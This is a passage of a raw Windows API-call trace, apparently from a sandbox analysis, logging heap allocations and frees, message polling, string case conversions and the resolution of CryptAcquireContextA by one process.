RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.909] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.909] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.910] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0263.910] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.910] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.916] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0263.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.916] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0263.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.917] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.920] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.920] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.920] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0263.920] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.921] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0263.921] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.921] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.921] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.922] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.922] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.922] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.922] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.922] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.922] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.922] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 